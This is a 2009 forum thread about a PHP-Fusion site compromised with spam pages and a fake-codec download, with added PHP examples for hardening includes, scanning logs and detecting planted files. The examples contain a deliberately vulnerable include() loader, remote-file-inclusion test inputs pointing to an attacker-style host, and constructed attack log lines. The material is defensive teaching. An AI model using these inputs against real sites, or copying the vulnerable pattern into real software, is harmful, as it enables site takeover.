A new site subdirectory has been created and an index page of nonsense has been placed there, along with 2400+ short HTML files, the titles of which seem mostly concerned with game cheats; also health problems and sports. So far, all of them that I've sampled contain only a video viewer that requires a download to view anything. VERY suspicious! You can see what I see at
[snip]
Warning: I wouldn't accept the download it offers!
PHP-Fusion v6.x is said to be full of security holes and I've been advised to upgrade to V7. Sure, I'll do that, as soon as possible, but I'd like to understand a bit better how someone managed to upload these files to our site. The only other possibility I know of is that someone discovered an FTP username and password. Seems very unlikely in our situation, but I'm going to delete all accounts and change the master password, anyway.
My questions:
1. What kind of security problems in a PHP package would allow someone to create new directories and upload files to our site?
2. What typically available hosting control panel tools might help me explain what happened? (The site access logs don't show any relevant activity at the creation time range of these new files.)
3. So far, it seems only that this intrusion is taking up room on our site. What hidden kinds of damage should I look for? (Obviously, anyone accepting the download is likely going to be getting malware, but ... this seems like an awfully inefficient method.)
4. I've Googled on some key features of the uploaded pages, but I've failed to find any reports of a similar exploit. Where would I look? What kind of search terms would I use?
5. Overall, how likely is it that I'll ever identify the actual vulnerability? Should I just quit looking and fix the obvious points (update PHP-Fusion and FTP accounts) and hope the issue doesn't recur?
6. Is there any downside to simply removing the uploaded files? Do the bad guys retaliate? (I'm planning on backing up the site entirely before making any changes, but this is a data-heavy site, 50+GB, and that's going to take a while.)
7. Where else should I look for advice?
TIA,
Henry
[edited by: phranque at 4:21 am (utc) on Mar. 28, 2009]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]
the following WebmasterWorld threads should have some useful information to get you started on a solution:
How Hacked Servers Can Hurt Your Traffic [webmasterworld.com]
Hacker gets access to server. How? [webmasterworld.com]
If you have PHP files, remote file inclusion (<- search term) is the main threat. If they can trick your vulnerable script into fetching and including a remote script, then they can upload files and do anything else they want to your site.
Your access logs are a valuable source of information. Check the FTP log for unauthorized transfers. If none there, check the HTTP log for recent attacks.
Record the timestamp of the added files. Check logs for who was doing what at that time.
It looks like the major vulnerability of PHP Fusion is SQL injection (<- another search term), though its effects are usually different from what you are reporting. Malicious code goes onto the page, but it comes from the database. Thousands of new files wouldn't be part of it.
However, one of the vulnerabilities listed at Secunia (as only "partially patched") allows "system access".
The odds are that that "video viewer" (a "codec" by any chance?) is a package full of viruses.
What happened to your site is really much more serious than you seem to be thinking. Protect your visitors by shutting it down. Upgrade PHP Fusion. Get rid of the malicious files. Investigate, starting with your logs.
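The include pattern behind "remote file inclusion" mentioned above, as an added example; this is not PHP-Fusion's code and was not posted in the thread, and the function names, page names and host names are invented for illustration:

```php
<?php
declare(strict_types=1);

// Added example, not PHP-Fusion's code and not posted in the thread. It shows
// the include pattern that makes remote file inclusion possible next to an
// allowlisted replacement. Function, page and host names are invented.

// VULNERABLE: the request supplies the include path. With allow_url_include
// on (or allow_url_fopen on PHP older than 5.2), ?page=http://attacker.example/
// x.txt fetches and runs that script; ?page=../../uploads/avatar.gif runs PHP
// hidden inside an uploaded image. Kept only as the "before"; never called.
function vulnerable_page_loader(array $get): void
{
    include $get['page'];
}

// Rough signature for a value that must never reach include(): a scheme
// prefix (http:, ftp:, php:, data:), a null byte, or a ".." path segment.
function looks_like_rfi(string $value): bool
{
    return (bool) preg_match(
        '~^[a-z][a-z0-9+.\-]*:|\x00|(^|[\\\\/])\.\.([\\\\/]|$)~i',
        $value
    );
}

// HARDENED: the request chooses a key; the code chooses the file, and the
// resolved path is confined to $baseDir even if the allowlist is misedited.
function resolve_page(string $requested, array $allowed, string $baseDir): ?string
{
    if (!isset($allowed[$requested])) {
        return null;                                   // unknown key: send a 404
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $allowed[$requested]);  // false for URLs and missing files
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Self-contained demonstration on a throwaway directory (constructed input).
function demo(): array
{
    $dir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
    mkdir($dir . '/pages', 0700, true);
    file_put_contents($dir . '/pages/news.php', "<?php echo 'news';\n");
    $allowed = ['news' => 'pages/news.php', 'faq' => 'pages/faq.php'];  // faq.php deliberately absent

    $inputs = ['news', 'faq', 'http://attacker.example/x.txt', '../../etc/passwd', 'php://input'];
    $out = [];
    foreach ($inputs as $in) {
        $out[$in] = [
            'signature' => looks_like_rfi($in),
            'resolved'  => resolve_page($in, $allowed, $dir),
        ];
    }
    unlink($dir . '/pages/news.php');
    rmdir($dir . '/pages');
    rmdir($dir);
    return $out;
}

foreach (demo() as $in => $r) {
    printf("%-32s signature=%-4s include=%s\n", $in, $r['signature'] ? 'yes' : 'no',
        $r['resolved'] === null ? 'rejected' : 'allowed');
}
// php.ini hardening that removes the remote half of this bug class regardless
// of application code: allow_url_include = Off (and allow_url_fopen = Off if
// nothing needs it), plus register_globals = Off.
```

The point of the allowlist is that the request never names a file at all, only a key; realpath() then refuses URLs and nonexistent files, and the prefix check catches an allowlist entry that someone later edits to point outside the site. The looks_like_rfi() signature is the same shape you would grep for in the access log's query strings.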
henry2, on the off chance that the video viewer is indeed the key to this thing, try a web search on fake video codec and see if anything that turns up looks familiar. If it does, do some reading on it because this is a common exploit, especially the "ZLOB Trojan". Although many of the reports are likely to be from the point of view of end-users, some hunting might turn up stories about how the exploit got installed on servers.
[edited by: SteveWh at 12:47 pm (utc) on Mar. 28, 2009]
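Going back to the log advice above (record the timestamp of the added files, then see who was doing what at that time), here is an added example that pulls the access-log lines within a window around that timestamp and flags the request shapes worth reading first. It is not from the thread; it assumes Apache "combined" log format, and the log lines embedded in it are constructed for the demo, with invented addresses, paths and user agents:

```php
<?php
declare(strict_types=1);

// Added example, not from the thread: list the access-log requests that fall
// within a window around the time a dropped file appeared, flagging POSTs,
// URL-in-parameter requests (the remote file inclusion shape) and traversal.
// Assumes Apache "combined" format. The sample lines are constructed.

function sample_log(): string
{
    return <<<'LOG'
203.0.113.7 - - [27/Mar/2009:03:10:02 +0000] "GET /news.php?readmore=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Mar/2009:03:12:44 +0000] "GET /index.php?page=http://198.51.100.9/x.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
203.0.113.7 - - [27/Mar/2009:03:12:45 +0000] "POST /index.php?page=http://198.51.100.9/x.txt? HTTP/1.1" 200 3301 "-" "libwww-perl/5.805"
203.0.113.7 - - [27/Mar/2009:03:13:01 +0000] "GET /cheats/index.html HTTP/1.1" 200 2200 "-" "libwww-perl/5.805"
198.51.100.22 - - [27/Mar/2009:03:15:09 +0000] "GET /forum/viewforum.php?forum_id=2 HTTP/1.1" 200 9011 "-" "Mozilla/4.0"
203.0.113.7 - - [27/Mar/2009:09:40:00 +0000] "GET /cheats/game-cheats-1.html HTTP/1.1" 200 1100 "-" "Mozilla/5.0"
LOG;
}

// host ident user [time] "METHOD path proto" status bytes "referer" "agent"
function parse_clf(string $line): ?array
{
    $re = '~^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3}) \S+(?: "[^"]*" "([^"]*)")?~';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $t = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($t === false) {
        return null;
    }
    return ['ip' => $m[1], 'ts' => $t->getTimestamp(), 'method' => $m[3],
            'path' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6] ?? ''];
}

function requests_around(array $lines, int $anchor, int $window): array
{
    $hits = [];
    foreach ($lines as $line) {
        $e = parse_clf($line);
        if ($e === null || abs($e['ts'] - $anchor) > $window) {
            continue;
        }
        $flags = [];
        if ($e['method'] === 'POST') {
            $flags[] = 'POST';
        }
        if (preg_match('~=\s*[a-z][a-z0-9+.\-]*://~i', $e['path'])) {
            $flags[] = 'url-in-parameter';
        }
        if (strpos($e['path'], '../') !== false) {
            $flags[] = 'traversal';
        }
        $e['flags'] = $flags;
        $hits[] = $e;
    }
    usort($hits, function (array $a, array $b): int { return $a['ts'] <=> $b['ts']; });
    return $hits;
}

// Anchor on the dropped file's ctime (inode change time): unlike mtime it
// cannot be set with touch. Without a real file, use a constructed timestamp.
function anchor_time(?string $path): int
{
    if ($path !== null && is_file($path) && ($s = stat($path)) !== false) {
        return $s['ctime'];
    }
    return DateTime::createFromFormat('d/M/Y:H:i:s O', '27/Mar/2009:03:13:00 +0000')->getTimestamp();
}

// Usage: php logwindow.php /path/to/dropped/file /var/log/apache2/access.log
$anchor = anchor_time($argv[1] ?? null);
$lines  = isset($argv[2]) && is_readable($argv[2])
    ? (file($argv[2], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: [])
    : explode("\n", sample_log());
$hits = requests_around($lines, $anchor, 15 * 60);
printf("%d request(s) within 15 minutes of %s UTC\n", count($hits), gmdate('Y-m-d H:i:s', $anchor));
foreach ($hits as $h) {
    printf("%s %-14s %-4s %3d %s%s\n", gmdate('H:i:s', $h['ts']), $h['ip'], $h['method'],
        $h['status'], $h['path'], $h['flags'] ? '   <- ' . implode(', ', $h['flags']) : '');
}
```

Once a client address stands out in the window, search the whole log for that address: the probing before the drop and the fetches of the new pages afterwards usually come from the same place. If the window is empty, the files did not arrive through the web server this log covers, which points back at the FTP log, another virtual host, or a scheduled job.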
phranque:
Thanks for the welcome and the articles. Which make my head spin. I had hoped not to get this deep in the technology. <grin>.
henry0:
I would definitely use SFTP if the hosting service supported it. It is a company well-known for domain registration services, but they also do hosting, and I'm not impressed with them for a number of reasons. I'm going to see if we can change to a different hosting service.
Nice to meet up with another Henry. Not too many of us around, it seems.
SteveWh:
Thanks for the link to Secunia. I had an idea something like this existed, but no idea how to look for it.
Thanks for the search term, "remote file inclusion". Now I'm worried about one of my other sites, D'oh!
From what I've seen, also, you are correct, the SQL Injection attack wouldn't usually leave thousands of new files.
I did a little more searching: Yes, the claimed video codec download is clearly a Zlob attack, it is a match, no doubt about it. But that's the second half. I haven't found any documentation of the first half, the thousands of files deposited on the server. Well, it doesn't matter, the penetration of the site is the foremost issue.
Bottom line:
All the docs and SteveWh's stern words have persuaded me to take down the site just as soon as possible, and my "management" has agreed. I don't think I need to read any more horror stories about how insecure PHP-Fusion 6.x is <grin>.
Thanks!
Henry
Thanks for your post on this thread.
Can you say a bit more about the symptoms of the inclusions you saw? What was the first symptom? What did you find on your server?
I haven't got anywhere figuring out which vulnerability was the method used on my site, and I guess it doesn't matter, so I'm going to use the latest versions of everything, and I've got a list of additional security measures, which now includes disabling register_globals.
No one has specifically said anything about this, but I'm thinking of some measures to detect some obvious hacks, say, letting the 2 system managers know when directories are added. What else?
Thanks,
Henry
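One way to get the "tell the managers when directories are added" check asked about above, as an added example that is not from the thread: a baseline-and-compare script for the web root, run from cron with MAILTO set to the two managers. It also reports new or changed files (scripts called out separately), files that turned world-writable, and removals. The paths, baseline file name and demo tree are invented:

```php
<?php
declare(strict_types=1);

// Added example, not from the thread: baseline-and-compare integrity check
// for a web root. Prints only when something changed, so cron's MAILTO mails
// the managers only then. Paths, baseline file and demo tree are invented.

function snapshot(string $root): array
{
    $root = rtrim($root, '/');
    $snap = ['dirs' => [], 'files' => []];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $path => $info) {
        $rel = substr($path, strlen($root) + 1);
        if ($info->isDir()) {
            $snap['dirs'][$rel] = $info->getPerms() & 0777;
        } elseif ($info->isFile()) {
            $snap['files'][$rel] = ['sha1' => sha1_file($path), 'mode' => $info->getPerms() & 0777];
        }
    }
    ksort($snap['dirs']);
    ksort($snap['files']);
    return $snap;
}

function compare_snapshots(array $old, array $new): array
{
    $report = [];
    foreach (array_diff_key($new['dirs'], $old['dirs']) as $d => $mode) {
        $report[] = sprintf('NEW DIR        %s (mode %o)', $d, $mode);
    }
    foreach ($new['files'] as $f => $meta) {
        $prev = $old['files'][$f] ?? null;
        $kind = preg_match('~(\.php\d?|\.phtml|\.htaccess)$~i', $f) ? 'SCRIPT' : 'FILE';
        if ($prev === null) {
            $report[] = sprintf('NEW %-11s%s', $kind, $f);
        } elseif ($prev['sha1'] !== $meta['sha1']) {
            $report[] = sprintf('CHANGED %-7s%s', $kind, $f);
        }
        if (($meta['mode'] & 0002) !== 0 && (($prev['mode'] ?? 0) & 0002) === 0) {
            $report[] = 'WORLD-WRITABLE ' . $f;
        }
    }
    foreach (array_diff_key($old['files'], $new['files']) as $f => $_) {
        $report[] = 'REMOVED        ' . $f;
    }
    return $report;
}

// Usage: php sitemon.php /var/www/html /var/lib/sitemon/baseline.json [--accept]
// The baseline is written on the first run and whenever --accept is given, so a
// planted file keeps being reported until a manager has looked at it. Keep the
// baseline outside the web root and unwritable by the web server user.
function run(string $root, string $baselinePath, bool $accept): array
{
    $new = snapshot($root);
    $old = is_file($baselinePath) ? json_decode((string) file_get_contents($baselinePath), true) : null;
    if (!is_array($old) || !isset($old['dirs'], $old['files'])) {
        $old = $new;          // first run or unreadable baseline: nothing to diff yet
        $accept = true;
    }
    $report = compare_snapshots($old, $new);
    if ($accept) {
        file_put_contents($baselinePath, json_encode($new), LOCK_EX);
    }
    return $report;
}

// Offline demonstration on a throwaway tree shaped like the symptoms in the thread.
function demo(): array
{
    $dir = sys_get_temp_dir() . '/sitemon_demo_' . getmypid();
    $baseline = $dir . '.baseline.json';
    mkdir($dir . '/images', 0700, true);
    file_put_contents($dir . '/index.php', "<?php echo 'home';\n");
    run($dir, $baseline, true);

    mkdir($dir . '/cheats');                                                   // new subdirectory
    file_put_contents($dir . '/cheats/index.html', "<html>nonsense</html>\n"); // with a page in it
    file_put_contents($dir . '/images/x.php', "<?php\n");                      // script where only images belong
    file_put_contents($dir . '/index.php', "<?php echo 'home'; // edited\n");  // a changed original
    $report = run($dir, $baseline, false);

    foreach (['/cheats/index.html', '/images/x.php', '/index.php'] as $f) {
        unlink($dir . $f);
    }
    rmdir($dir . '/cheats');
    rmdir($dir . '/images');
    rmdir($dir);
    unlink($baseline);
    return $report;
}

$report = isset($argv[1], $argv[2]) ? run($argv[1], $argv[2], in_array('--accept', $argv, true)) : demo();
if ($report) {
    echo implode("\n", $report), "\n";
}
exit($report ? 1 : 0);
```

Two things worth knowing before relying on it: it only catches what appears after the baseline is taken, so take the baseline from a clean reinstall, not from the compromised tree; and a check that runs as the web server user can be silenced by the same intruder who can write to the web root, so run it as a different account from cron and keep the baseline where that account alone can write.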